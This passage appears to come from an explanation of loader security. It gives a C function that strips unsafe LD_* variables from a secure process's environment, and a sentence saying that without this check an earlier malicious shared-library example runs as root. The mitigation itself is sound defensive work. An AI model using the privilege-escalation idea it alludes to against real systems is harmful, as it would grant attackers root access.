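/* In a secure process, drop unsafe LD_* entries from the NULL-terminated
 * envp in place. Returns how many entries were removed. */
size_t scrub_ld_env(char **envp, int secure)
{
    size_t in, out = 0, dropped = 0;
    if (!secure) return 0;
    for (in = 0; envp[in] != NULL; in++) {
        if (is_unsafe_ld_var(envp[in])) { dropped++; continue; }
        envp[out++] = envp[in];
    }
    envp[out] = NULL;
    return dropped;
}
```

Calling scrub_ld_env(envp, env_is_secure()) before anything reads the environment is the check whose absence lets the dupa.so example above run as root.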